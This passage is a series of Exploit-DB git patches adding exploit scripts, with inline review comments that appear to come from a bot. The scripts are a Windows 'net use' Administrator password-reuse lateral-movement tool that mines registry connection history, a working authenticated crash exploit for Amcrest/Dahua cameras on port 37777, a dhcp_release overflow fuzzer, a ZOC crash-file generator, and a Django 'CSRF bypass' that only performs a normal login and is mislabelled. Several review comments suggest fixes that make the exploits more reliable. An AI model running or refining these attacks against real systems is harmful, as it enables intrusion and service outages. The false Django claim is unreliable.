door and increases the attack surface if the box we laterally move to +has other vulnerabilities present. + +In contrast authenticating using the "unc path" "\\x.x.x.x\c$" using an explorer type logon does prompt for credentials as expected. +The authentication mechanism between the two network logon methods are inconsistent and in my opinion leaves an authentication loophole invitation. +Moreover, since this targets built-in Administrator account, one would think there would be more or equal security measures in place not less. + +Requirements: +1) Remote system built-in Administrator account is enabled +2) Origination system users account password and the remote system Administrator passwords match (reuse). 
+ +Typically, to gain Admin privileges on remote logon you may have to create and enable "LocalAccountTokenFilterPolicy" but NOT in this case. +Again, the "LocalAccountTokenFilterPolicy" registry setting does NOT need to exist and is NOT enabled and has no bearing on the issue. + +However, if "FilterAdministratorToken" is enabled in registry on the remote system then the above loophole scenario fails. +Interestingly, the "FilterAdministratorToken" setting does not seem to exist by default in the Windows registry. + +Therefore, if an attacker pops a box they can check "MountPoints2" registry values usually used by forensic analysts for previous network connections +and try them and if theres password reuse (likely) BOOM automagic logon. + +This vuln occurs due to an inconsistent password dialog prompting and whether the "net use" logon method is used. +When testing make sure to logout then log back in after changing passwords so the environment is clean. + +e.g. + +1) Passwords for both systems are different and remote built-in Administrator account active: + +C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator + +Enter the password for 'Administrator' to connect to '192.168.x.x': +System error 5 has occurred. + +Access is denied. + +2) Passwords for both origination system and remote match: + +C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator +The command completed successfully. + +By the way as a side note DCERPC calls work as well, if both systems happen to have same password. +c:\>getmac /s x.x.x.x /U Administrator + +MSRC in their response, pointed out that "No login prompt on remote connection if both Administrator password are the same." +Ok, but why does "net use" not follow the same pattern as doing a UNC-Path type of logon, where we get the expected cred dialog box? + +Expected result: Consistent password dialog box, no matter if passwords match or not. +Actual Result: No prompt for a password if both systems passwords are the same. 
+ +Tested successfully on fully patched Windows 10 using VM, also across LAN to a non-domain connected PC. + + +[Exploit/POC] +import os,re,time,signal,sys +from subprocess import * +from multiprocessing import Process + +#By John Page (aka hyp3rlinx) +#Apparition Security +#twitter.com/hyp3rlinx +#----------------------------------- +#When a remote systems built-in Administrator account is enabled and both the remote and the target system +#passwords match (password reuse) theres no prompt for credentials and we get logged in automagically. +# +#MountPoints2 and Terminal server client hints in the Windows registry can help us. +#Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously. +#REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons) +#MountPoints2 key entries are stored like '##10.2.1.40#c$' +#----------------------------------------------------------- + +BANNER=""" + _ ______________ ___ ____ __ _______ ______ + / | / / ____/_ __/ / | / __ )/ / / / ___// ____/ + / |/ / __/ / / / /| | / __ / / / /\__ \/ __/ + / /| / /___ / / / ___ |/ /_/ / /_/ /___/ / /___ +/_/ |_/_____/ /_/ /_/ |_/_____/\____//____/_____/ + + By Hyp3rlinx + ApparitionSec +""" + +DRIVE="X" +FINDME="The command completed successfully." +REG_MOUNT2='REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##"' +REG_RDPUSERS="REG Query \"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\""+" /s" +VULN_FOUND=set() +DELAY=2 #Any lower and we may get inaccurate results. +rdp_server_lst=[] + +#Return prior network logons to remote systems. +def mountpoints2(): + mntpoint2_connections=[] + try: + p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True) + tmp = p.stdout.readlines() + except Exception as e: + print("[!] 
"+str(e)) + return False + for x in tmp: + idx = x.find("##") + clean = x[idx:] + idx2 = clean.rfind("#") + ip = clean[2:idx2] + ip = re.sub(r"#.*[A-Z,a-z]","",ip) + if ip not in mntpoint2_connections: + mntpoint2_connections.append(ip) + mntpoint2_connections = list(filter(None, mntpoint2_connections)) + p.kill() + return mntpoint2_connections + + +#Terminal server client stores remote server connections. +def rdp_svrs(): + global rdp_server_lst + try: + p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True) + tmp = p.stdout.readlines() + for key in tmp: + if key.find("Servers")!=-1: + pos = key.rfind("\\") + srv = key[pos + 1:].replace("\r\n","").strip() + rdp_server_lst.append(srv) + p.kill() + except Exception as e: + print("[!] "+str(e)) + return False + return True + + +#Disconnect +def del_vuln_connection(ip): + try: + print("[!] Disconnecting vuln network logon connection.\n") + call(r"net use "+DRIVE+":"+" /del") + except Exception as e: + print("[!] "+str(e)) + + +#Check connection +def chk_connection(ip): + print("[+] Testing: "+ip) + sys.stdout.flush() + cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True) + stderr, stdout = cmd.communicate() + if "Reply from" in stderr and "Destination host unreachable" not in stderr: + print("[*] Target up!") + return True + else: + print("[!] 
Target unreachable :(") + return False + + +#Test vuln +def Test_Password_Reuse(ip): + print("[+] Testing "+ip + " the builtin Administrator account.\n") + sys.stdout.flush() + try: + p = Popen("net use X: \\\\"+ip+"\\c$ /user:Administrator", stdout=PIPE, stderr=PIPE, shell=True) + err = p.stderr.readlines() + + if err: + e = str(err) + if e.find("error 53")!=-1: + print("[*] Network path not found\n") + return + elif e.find("error 1219")!=-1: + print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.\n") + return + elif e.find("error 85")!=-1: + print("[*] The local device name is already in use.\n") + return + else: + print(e+"\n") + + tmp = p.stdout.read() + + if FINDME in tmp: + print("[*] Password reuse for the built-in Administrator found!") + print("[+] Connected to target: "+ ip) + VULN_FOUND.add(ip+":Administrator") + del_vuln_connection(ip) + p.kill() + except Exception as e: + print("[!] "+str(e)) + + + +#Authenticate +def auth(ip): + action_process = Process(target=Test_Password_Reuse, args=(ip,)) + action_process.start() + action_process.join(timeout=5) + action_process.terminate() + + +if __name__ == "__main__": + + print(BANNER) + print("[+] Windows 'net use' Network Logon Type-3") + print("[+] Insufficient Password Prompt") + print("[+] By hyp3rlinx\n") + + time.sleep(3) + + print("[+] Deleting any existing network logons to start clean.") + + #Make sure no exist sessions already exist. + call(r"net use * /del /y") + sys.stdout.flush() + time.sleep(1) + + + #Grab previous connections from MountPoints2 if any. + rdp_svrs() + svrlst=mountpoints2() + + if svrlst: + svrlst + rdp_server_lst + else: + svrlst = rdp_server_lst + + if not svrlst: + print("[*] No MountPoints2 artifacts found, enter an IP.") + sys.stdout.flush() + ip=raw_input("[+] Target IP> ") + if chk_connection(ip): + auth(ip) + else: + #We have MountPoints2 or RDP Server list IP we can try. 
+ for ip in svrlst: + if chk_connection(ip): + auth(ip) + + time.sleep(DELAY) + + + if len(VULN_FOUND) != 0: + print("[*] Located the following vulnerable systems:") + sys.stdout.flush() + for v in VULN_FOUND: + print("[+] "+v) + else: + print("[+] All previous attempts failed, enter an IP and give it a shot!.") + sys.stdout.flush() + ip=raw_input("[+] Target IP> ") + if chk_connection(ip): + auth(ip) + + + +[POC Video URL] +https://www.youtube.com/watch?v=Je93Neb0k8g + + +[Network Access] +Remote + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: February 28, 2020 +MSRC "behavior you are reporting is by design" : March 30, 2020 +April 5, 2020 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 083c698cc..ebfba676e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
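Review bot: In the `__main__` block, `if svrlst: svrlst + rdp_server_lst` evaluates the concatenation and throws it away, so whenever MountPoints2 entries exist the RDP server list is never merged into the targets; `svrlst += rdp_server_lst` (or `svrlst.extend(rdp_server_lst)`) is what was intended. In `chk_connection`, `stderr, stdout = cmd.communicate()` swaps the names - `communicate()` returns `(stdout, stderr)` - so the `"Reply from"` test only works because ping's stdout lands in the variable called `stderr`; `stdout, stderr = cmd.communicate()` fixes it. `Test_Password_Reuse`, `mountpoints2` and `rdp_svrs` build command strings for `shell=True`, and `ip` is taken verbatim from HKCU registry values, so a crafted MountPoints2 key name could inject into the shell; pass an argv list without `shell=True`, or validate `ip` against an address/hostname pattern before use. The file mixes `print(...)` with `raw_input`, so it runs only under Python 2, which the header should state. On the finding itself, MSRC's "by design" answer matches what the advisory's own transcript shows - with `/user:` and no password, Windows tries the current session's password for the supplied name before prompting - so what the tool really detects is built-in Administrator password reuse between hosts, a useful lateral-movement check, but the "insufficient authentication" framing overstates it.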
@@ -6692,6 +6692,14 @@ id,file,description,date,author,type,platform,port
 48259,exploits/windows/dos/48259.py,"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)",2020-03-27,"Ivan Marmolejo",dos,windows,
 48269,exploits/windows/dos/48269.py,"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)",2020-03-31,"Paras Bhatia",dos,windows,
 48276,exploits/windows/dos/48276.py,"DiskBoss 7.7.14 - Denial of Service (PoC)",2020-04-01,"Paras Bhatia",dos,windows,
+48284,exploits/windows/dos/48284.py,"Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
+48285,exploits/windows/dos/48285.py,"SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
+48286,exploits/windows/dos/48286.py,"Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
+48287,exploits/windows/dos/48287.py,"Frigate 3.36 - Denial of Service (PoC)",2020-04-06,inter,dos,windows,
+48288,exploits/windows/dos/48288.py,"UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48290,exploits/windows/dos/48290.py,"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48291,exploits/windows/dos/48291.py,"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11011,6 +11019,9 @@ id,file,description,date,author,type,platform,port
 48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows,
 48279,exploits/windows/local/48279.py,"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2020-04-02,"Paras Bhatia",local,windows,
 48281,exploits/windows/local/48281.py,"AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)",2020-04-03,Hodorsec,local,windows,
+48283,exploits/windows/local/48283.txt,"Memu Play 7.1.3 - Insecure Folder Permissions",2020-04-06,chuyreds,local,windows,
+48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows,
+48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42526,3 +42537,9 @@ id,file,description,date,author,type,platform,port 48270,exploits/hardware/webapps/48270.py,"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware, 48271,exploits/hardware/webapps/48271.py,"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware, 48280,exploits/php/webapps/48280.py,"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution",2020-04-03,"Basim Alabdullah",webapps,php, +48289,exploits/php/webapps/48289.txt,"LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,php, +48294,exploits/multiple/webapps/48294.rb,"Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)",2020-04-06,"Mehmet Ince",webapps,multiple, +48295,exploits/multiple/webapps/48295.txt,"WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting",2020-04-06,"Gal Weizman",webapps,multiple, +48296,exploits/php/webapps/48296.py,"Bolt CMS 3.7.0 - Authenticated Remote Code Execution",2020-04-06,r3m0t3nu11,webapps,php, +48297,exploits/php/webapps/48297.txt,"LimeSurvey 4.1.11 - 'File Manager' Path Traversal",2020-04-06,"Matthew Aberegg",webapps,php, +48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd, From 36c65f8dd4df875987b37b467d7a03df7dd163ba Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 8 Apr 2020 05:01:50 +0000 Subject: [PATCH 03/18] DB: 2020-04-08 2 changes to exploits/shellcodes dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC) ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC) --- exploits/linux/dos/48301.py | 38 +++++++++++++++++++++++++++++++++++ exploits/windows/dos/48302.py | 21 +++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 61 insertions(+) create mode 100755 exploits/linux/dos/48301.py create mode 100755 exploits/windows/dos/48302.py diff --git a/exploits/linux/dos/48301.py b/exploits/linux/dos/48301.py new file mode 100755 index 000000000..aa6146124 --- /dev/null +++ b/exploits/linux/dos/48301.py @@ -0,0 +1,38 @@ +# Exploit Title: dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC) +# Date: 2020-04-06 +# Exploit Author: Josue Encinar +# Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1 +# Version: 2.79 +# Tested on: Ubuntu 18.04 + + +from subprocess import Popen, PIPE + +data = "" +bof = False +for i in range (1, 200): + A = "A"*i + data = f"dhcp_release {A} 1 1" + try: + result = Popen(data, stdout=PIPE, stderr=PIPE, shell=True) + error = result.stderr.read().decode() + if "Aborted (core dumped)" in error: + print("[+] Buffer Overflow detected!") + print(f"[*] Offset: {i}") + bof = True + break + except Exception as e: + print(f"[-] {e}") + +if not bof: + print("[-] No buffer overflow...") + + +## Check line 273 in dhcp_release.c +### strcpy(ifr.ifr_name, argv[1]); +# +## PoC: +# josue@ubuntu:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py +# *** buffer overflow detected ***: dhcp_release terminated +# [+] Buffer Overflow detected! +# [*] Offset: 16 \ No newline at end of file diff --git a/exploits/windows/dos/48302.py b/exploits/windows/dos/48302.py new file mode 100755 index 000000000..1f658e2bd --- /dev/null +++ b/exploits/windows/dos/48302.py 
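Review bot: The crash check in the loop depends on the shell rather than on dhcp_release: `Popen(data, ..., shell=True)` runs the command under `/bin/sh`, and the `"Aborted (core dumped)"` string it searches for is that shell's own report of the child's SIGABRT (the PoC transcript at the bottom shows the fortify line `*** buffer overflow detected ***`, a different message), so the match may never fire on a host whose `/bin/sh` words it differently. Testing the exit status is shell-independent and also removes the string-built command line: `proc = Popen(["dhcp_release", A, "1", "1"], stdout=PIPE, stderr=PIPE)`, `out, err = proc.communicate()`, then `if proc.returncode == -signal.SIGABRT or "buffer overflow detected" in err.decode():` (with `import signal` at the top). The header should also state that this is a crash of the local `dhcp_release` command-line helper when given an over-long interface name (the comment points at `strcpy(ifr.ifr_name, argv[1])`), since "Denial of Service" on its own suggests something network-reachable.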
@@ -0,0 +1,21 @@ +# Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-04-05 +# Vendor Homepage: https://www.emtec.com +# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe +# Tested Version: 7.25.5 +# Vulnerability Type: Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to produce the crash: +# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "exp.zrx" +# 2.- Open ZOC Terminal +# 3.- Select Script > Start REXX Script... +# 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open" +# 5.- Crashed + +cod = "\x41" * 20000 + +f = open('ZOC_7.25.5_Script.zrx', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ebfba676e..0e71d3f74 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6700,6 +6700,8 @@ id,file,description,date,author,type,platform,port 48290,exploits/windows/dos/48290.py,"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, 48291,exploits/windows/dos/48291.py,"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, 48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, +48301,exploits/linux/dos/48301.py,"dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)",2020-04-07,JosueEncinar,dos,linux, +48302,exploits/windows/dos/48302.py,"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)",2020-04-07,chuyreds,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
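Review bot: Step 1 of the reproduction comment says the script creates `exp.zrx`, but the code writes `ZOC_7.25.5_Script.zrx` (and step 4 names that file), so a reader following the steps looks for the wrong file; change it to `# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "ZOC_7.25.5_Script.zrx"`. The three-line open/write/close would also be better as `with open('ZOC_7.25.5_Script.zrx', 'w') as f: f.write(cod)`, which closes the handle even if the write raises.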
From 6d55b45cdfc364cb6b2787cc9acc1dc726e3ce9c Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 9 Apr 2020 05:01:51 +0000
Subject: [PATCH 04/18] DB: 2020-04-09
2 changes to exploits/shellcodes
Django 3.0 - Cross-Site Request Forgery Token Bypass
Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)
---
exploits/hardware/webapps/48304.py | 153 +++++++++++++++++++++++++++++
exploits/php/webapps/48303.txt | 111 +++++++++++++++++++++
files_exploits.csv | 2 +
3 files changed, 266 insertions(+)
create mode 100755 exploits/hardware/webapps/48304.py
create mode 100644 exploits/php/webapps/48303.txt
diff --git a/exploits/hardware/webapps/48304.py b/exploits/hardware/webapps/48304.py
new file mode 100755
index 000000000..b73eb9ca5
--- /dev/null
+++ b/exploits/hardware/webapps/48304.py
@@ -0,0 +1,153 @@ +# Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC) +# Date: 2020-04-07 +# Exploit Author: Jacob Baines +# Vendor Homepage: https://amcrest.com/ +# Software Link: https://amcrest.com/firmwaredownloads +# Version: Many different versions due to number of Dahua/Amcrest/etc +# devices affected +# Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5 +# 4.000.00AC000.0 +# CVE : CVE-2020-5735 +# Advisory: https://www.tenable.com/security/research/tra-2020-20 +# Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash + +import argparse +import hashlib +import socket +import struct +import sys +import md5 +import re + +## DDNS test functionality. Stack overflow via memcpy + +def recv_response(sock): + # minimum size is 32 bytes + header = sock.recv(32) + + # check we received enough data + if len(header) != 32: + print 'Invalid response. Too short' + return (False, '', '') + + # extract the payload length field + length_field = header[4:8] + payload_length = struct.unpack_from('I', length_field) + payload_length = payload_length[0] + + # uhm... lets be restrictive of accepted lengths + if payload_length < 0 or payload_length > 4096: + print 'Invalid response. Bad payload length' + return (False, header, '') + + if (payload_length == 0): + return (True, header, '') + + payload = sock.recv(payload_length) + if len(payload) != payload_length: + print 'Invalid response. 
Bad received length' + return (False, header, payload) + + return (True, header, payload) + +def sofia_hash(msg): + h = "" + m = hashlib.md5() + m.update(msg) + msg_md5 = m.digest() + for i in range(8): + n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e + if n > 9: + if n > 35: + n += 61 + else: + n += 55 + else: + n += 0x30 + h += chr(n) + return h + +top_parser = argparse.ArgumentParser(description='lol') +top_parser.add_argument('-i', '--ip', action="store", dest="ip", +required=True, help="The IPv4 address to connect to") +top_parser.add_argument('-p', '--port', action="store", dest="port", +type=int, help="The port to connect to", default="37777") +top_parser.add_argument('-u', '--username', action="store", +dest="username", help="The user to login as", default="admin") +top_parser.add_argument('--pass', action="store", dest="password", +required=True, help="The password to use") +args = top_parser.parse_args() + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +print "[+] Attempting connection to " + args.ip + ":" + str(args.port) +sock.connect((args.ip, args.port)) +print "[+] Connected!" + +# send the old style login request. We'll use blank hashes. This should +# trigger a challenge from new versions of the camera +old_login = ("\xa0\x05\x00\x60\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + # username hash + "\x00\x00\x00\x00\x00\x00\x00\x00" + # password hash + "\x05\x02\x00\x01\x00\x00\xa1\xaa") +sock.sendall(old_login) +(success, header, challenge) = recv_response(sock) +if success == False or not challenge: + print 'Failed to receive the challenge' + print challenge + sys.exit(0) + +# extract the realm and random seed +seeds = re.search("Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n", +challenge) +if seeds == None: + print 'Failed to extract realm and random seed.' 
+ print challenge + sys.exit(0) + +realm = seeds.group(1) +random = seeds.group(2) + +# compute the response +realm_hash = md5.new(args.username + ":" + realm + ":" + +args.password).hexdigest().upper() +random_hash = md5.new(args.username + ":" + random + ":" + +realm_hash).hexdigest().upper() +sofia_result = sofia_hash(args.password) +final_hash = md5.new(args.username + ":" + random + ":" + +sofia_result).hexdigest().upper() + +challenge_resp = ("\xa0\x05\x00\x60\x47\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x05\x02\x00\x08\x00\x00\xa1\xaa" + + args.username + "&&" + random_hash + final_hash) +sock.sendall(challenge_resp) + +(success, header, payload) = recv_response(sock) +if success == False or not header: + print 'Failed to receive the session id' + sys.exit(0) + +session_id_bin = header[16:20] +session_id_int = struct.unpack_from('I', session_id_bin) +if session_id_int[0] == 0: + print "Log in failed." + sys.exit(0) + +session_id = session_id_int[0] +print "[+] Session ID: " + str(session_id) + +# firmware version +command = "Protocol: " + ("a" * 0x300) + "\r\n" +command_length = struct.pack("I", len(command)) +firmware = ("\x62\x00\x00\x00" + command_length + + "\x04\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + command) +sock.sendall(firmware) +(success, header, firmware_string) = recv_response(sock) +if success == False and not header: + print "[!] Probably crashed the server." +else: + print "[+] Attack failed." \ No newline at end of file diff --git a/exploits/php/webapps/48303.txt b/exploits/php/webapps/48303.txt new file mode 100644 index 000000000..d15f6555f --- /dev/null +++ b/exploits/php/webapps/48303.txt 
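Review bot: `recv_response` treats a short read as a protocol error: `sock.recv(32)` and `sock.recv(payload_length)` may each return fewer bytes than requested on a TCP stream, and the `len(header) != 32` / `len(payload) != payload_length` checks then abort the login handshake with "Invalid response" even though the camera answered correctly, so the PoC is flaky over anything but a LAN. Read until the requested count arrives (helper below) and make the byte order explicit — `struct.unpack_from('I', ...)` and the matching `struct.pack("I", ...)` use the host's native size and order, which for the author was presumably little-endian x86; the protocol's real order is not stated in the hunk, so `'<I'` is the conservative choice that reproduces that behaviour on any host. The `payload_length < 0` test is dead for an unsigned field and can go.

```python
def recv_exact(sock, count):
    # TCP is a byte stream: a single recv() may return fewer than count bytes
    buf = ''
    while len(buf) < count:
        chunk = sock.recv(count - len(buf))
        if not chunk:
            break  # peer closed; caller sees a short buffer
        buf += chunk
    return buf

def recv_response(sock):
    # minimum size is 32 bytes
    header = recv_exact(sock, 32)
    # ... unchanged: short-header check ...

    # fixed-width little-endian; native 'I' depends on the host running the PoC
    payload_length = struct.unpack_from('<I', header[4:8])[0]
    # ... unchanged: payload length sanity check and zero-length return ...

    payload = recv_exact(sock, payload_length)
    # ... unchanged: length check and return ...
```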
@@ -0,0 +1,111 @@ +# Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass +# Date: 2020-04-08 +# Exploit Author: Spad Security Group +# Vendor Homepage: https://www.djangoproject.com/ +# Software Link: https://pypi.org/project/Django/ +# Version: 3.0 =< +# Tested on: windows 10 +# Language: python3.8 + +# t.me/SpadSec +# Spad Security Group + + +from requests import Session +import sys +from bs4 import BeautifulSoup +from time import sleep +from colorama import Fore, Style +from random import choice +from os import name, system + +colors = [Fore.RED, Fore.BLUE, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.YELLOW] + + +def cleaner(): + if name == "nt": + system("cls") + else: + system("clear") + +def logo_printer(): + cleaner() + logo = r""" + \_______/ + `.,-'\_____/`-.,' + /`..'\ _ /`.,'\ + / /`.,' `.,'\ \ +/__/__/ \__\__\__ +\ \ \ / / / + \ \,'`._,'`./ / + \,'`./___\,'`./ + ,'`-./_____\,-'`. + / \ + """ + _logo_enumer = 0 + for char in logo: + sys.stdout.write(f"{choice(colors)}{char}{Style.RESET_ALL}") + sys.stdout.flush() + _logo_enumer +=1 + sleep(0.005) + print(f"{colors[4]}DjangoCsrfMiddlewareToken bypass by SpadSecurity Group \n{colors[3]}\tt.me/SpadSec") + +class DjangoCsrfMiddleWareBypass: + def __init__(self, url: str, username: str, password: str): + self.url = url + self.username = username + self.password = password + logo_printer() + self.cookies = {} + self.session = Session() + self.bypass() + + def spad_printer(self, string): + print("\n") + for char in string: + sys.stdout.write(char) + sys.stdout.flush() + sleep(0.05) + + def bypass(self): + global colors + _conn = self.session.get(self.url) + self.spad_printer(f"{colors[5]}[{colors[0]}x{colors[5]}] {colors[4]}Target: {colors[3]}{self.url}") + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Trying to bypass cookies ...") + for key, value in _conn.cookies.items(): + self.cookies[key] = value + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] 
{colors[1]}Bypassed Cookies ;)!") + + soup = BeautifulSoup(_conn.text, "lxml") + csrf = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value'] + self.spad_printer(f"{colors[5]}[{colors[0]}~{colors[5]}] {colors[1]}Csrf-Token Found{Style.RESET_ALL}") + + login = self.session.post(self.url, data={'csrfmiddlewaretoken': csrf, 'username': self.username, 'password': self.password}, cookies=self.cookies) + if len(login.history) >= 2: + if login.history[1].is_redirect: + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in") + else: + self.spad_printer("[-] Error") + else: + if login.history: + if login.history[0].is_redirect: + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in{Style.RESET_ALL}") + for key, value in self.session.cookies.items(): + self.spad_printer(f"{colors[5]}[{colors[0]}!{colors[5]}] {colors[4]}{key} {colors[1]}-> {colors[4]}{value}{Style.RESET_ALL}") + else: + self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error") + else: + self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error") + +if __name__ == "__main__": + try: + url = sys.argv[1] + username = sys.argv[2] + password = sys.argv[3] + DjangoCsrfMiddleWareBypass(url, username, password) + except IndexError: + logo_printer() + for char in f"[!] python {sys.argv[0]} http://google.com username password": + sys.stdout.write(char) + sys.stdout.flush() + sleep(0.05) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 0e71d3f74..600baaeaa 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
